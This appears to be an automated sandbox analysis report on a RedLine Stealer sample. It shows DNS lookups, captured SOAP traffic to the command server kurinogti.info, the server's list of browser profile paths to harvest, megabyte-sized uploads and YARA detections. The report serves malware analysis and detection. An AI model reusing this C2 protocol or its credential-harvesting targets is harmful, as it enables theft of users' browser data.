                                                                                Jul 22, 2021 11:43:38.148147106 CEST53615228.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:38.464032888 CEST5233753192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:38.521648884 CEST53523378.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:38.886616945 CEST5504653192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:38.937699080 CEST53550468.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:39.142761946 CEST4961253192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:39.199538946 CEST53496128.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:39.215955019 CEST4928553192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:39.305951118 CEST53492858.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:39.741610050 CEST5060153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:39.863806963 CEST53506018.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:40.079305887 CEST6087553192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:40.131608009 CEST53608758.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:40.518070936 CEST5644853192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:40.578258038 CEST53564488.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:41.162909031 CEST5917253192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:41.194658041 CEST6242053192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:41.221112967 CEST53591728.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:41.248284101 CEST53624208.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:41.909432888 CEST6057953192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:41.967762947 CEST53605798.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:42.848491907 CEST5018353192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:42.905883074 CEST53501838.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:44.394387007 CEST6153153192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:44.453234911 CEST53615318.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:44.917622089 CEST4922853192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:44.969666958 CEST53492288.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:53.419203043 CEST5979453192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:53.489016056 CEST53597948.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:54.164475918 CEST5591653192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:54.236103058 CEST53559168.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:54.364074945 CEST5275253192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:54.424232006 CEST53527528.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:43:56.183053970 CEST6054253192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:43:56.242552042 CEST53605428.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:44:30.144248009 CEST6068953192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:44:30.210551977 CEST53606898.8.8.8192.168.2.4
                                                                                Jul 22, 2021 11:44:31.411508083 CEST6420653192.168.2.48.8.8.8
                                                                                Jul 22, 2021 11:44:31.476748943 CEST53642068.8.8.8192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                Jul 22, 2021 11:43:22.636591911 CEST192.168.2.48.8.8.80x7defStandard query (0)kurinogti.infoA (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:24.504048109 CEST192.168.2.48.8.8.80xe7f1Standard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:24.573537111 CEST192.168.2.48.8.8.80xee1fStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:28.698682070 CEST192.168.2.48.8.8.80xe3afStandard query (0)kurinogti.infoA (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:30.653006077 CEST192.168.2.48.8.8.80x462aStandard query (0)kurinogti.infoA (IP address)IN (0x0001)

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                Jul 22, 2021 11:43:22.728972912 CEST8.8.8.8192.168.2.40x7defNo error (0)kurinogti.info45.139.184.124A (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:24.565942049 CEST8.8.8.8192.168.2.40xe7f1No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                Jul 22, 2021 11:43:24.633591890 CEST8.8.8.8192.168.2.40xee1fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                Jul 22, 2021 11:43:28.758416891 CEST8.8.8.8192.168.2.40xe3afNo error (0)kurinogti.info45.139.184.124A (IP address)IN (0x0001)
                                                                                Jul 22, 2021 11:43:30.711245060 CEST8.8.8.8192.168.2.40x462aNo error (0)kurinogti.info45.139.184.124A (IP address)IN (0x0001)

                                                                                HTTP Request Dependency Graph

                                                                                • kurinogti.info

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.44973545.139.184.12480C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 22, 2021 11:43:22.983927965 CEST1657OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                Host: kurinogti.info
                                                                                Content-Length: 144
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Jul 22, 2021 11:43:23.067276001 CEST1657INHTTP/1.1 100 Continue
                                                                                Jul 22, 2021 11:43:23.196957111 CEST1658INHTTP/1.1 200 OK
                                                                                Server: nginx/1.2.1
                                                                                Date: Thu, 22 Jul 2021 09:43:22 GMT
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Content-Length: 4685
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 65 6e 74 42 72 6f 77 73 65 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\CentBrowser\User Data</b:string><b:string>%USERP


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                1192.168.2.44974245.139.184.12480C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 22, 2021 11:43:28.854557037 CEST1736OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                                                Host: kurinogti.info
                                                                                Content-Length: 1098077
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Jul 22, 2021 11:43:28.937829971 CEST1736INHTTP/1.1 100 Continue
                                                                                Jul 22, 2021 11:43:30.618522882 CEST3028INHTTP/1.1 200 OK
                                                                                Server: nginx/1.2.1
                                                                                Date: Thu, 22 Jul 2021 09:43:29 GMT
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Content-Length: 147
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                2192.168.2.44974445.139.184.12480C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Jul 22, 2021 11:43:30.798144102 CEST3029OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                Host: kurinogti.info
                                                                                Content-Length: 1098069
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Jul 22, 2021 11:43:30.881643057 CEST3029INHTTP/1.1 100 Continue
                                                                                Jul 22, 2021 11:43:32.497615099 CEST4330INHTTP/1.1 200 OK
                                                                                Server: nginx/1.2.1
                                                                                Date: Thu, 22 Jul 2021 09:43:31 GMT
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Content-Length: 261
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Start time:11:42:56
                                                                                Start date:22/07/2021
                                                                                Path:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Users\user\Desktop\JEPayKhzWa.exe'
                                                                                Imagebase:0xf70000
                                                                                File size:373760 bytes
                                                                                MD5 hash:F471BF615EF92F5EE73B48FE203373DE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.657835482.00000000042E1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                General

                                                                                Start time:11:42:56
                                                                                Start date:22/07/2021
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff724c50000
                                                                                File size:625664 bytes
                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                General

                                                                                Start time:11:42:59
                                                                                Start date:22/07/2021
                                                                                Path:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                Imagebase:0x2c0000
                                                                                File size:373760 bytes
                                                                                MD5 hash:F471BF615EF92F5EE73B48FE203373DE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low

                                                                                General

                                                                                Start time:11:43:02
                                                                                Start date:22/07/2021
                                                                                Path:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\Desktop\JEPayKhzWa.exe
                                                                                Imagebase:0xef0000
                                                                                File size:373760 bytes
                                                                                MD5 hash:F471BF615EF92F5EE73B48FE203373DE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.712342229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >